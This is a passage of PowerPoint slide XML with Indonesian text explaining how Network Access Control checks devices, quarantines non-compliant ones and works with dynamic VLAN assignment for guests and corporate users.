            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyelesaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugasnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. NAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memainkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengkarantina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencurigakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bring-your-own-device (BYOD) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT, NAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>NAC dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual (VLAN) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengotomatiskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> NAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berintegrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VLAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VLAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinamis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penetapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VLAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinamis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> NAC yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VLAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeriksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesehatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkunjung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditempatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VLAN yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Akses internet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>korporat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditempatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VLAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internal. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, NAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berinteraksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VLAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinamis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karantina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan-misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> antivirus yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbarui-sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> NAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
